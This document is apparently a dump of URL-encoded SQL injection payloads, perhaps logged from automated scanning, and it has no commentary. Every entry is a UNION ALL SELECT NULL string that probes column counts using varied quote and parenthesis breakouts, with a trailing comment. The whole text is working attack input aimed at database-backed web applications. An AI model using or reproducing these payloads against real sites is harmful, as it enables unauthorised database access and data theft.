1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 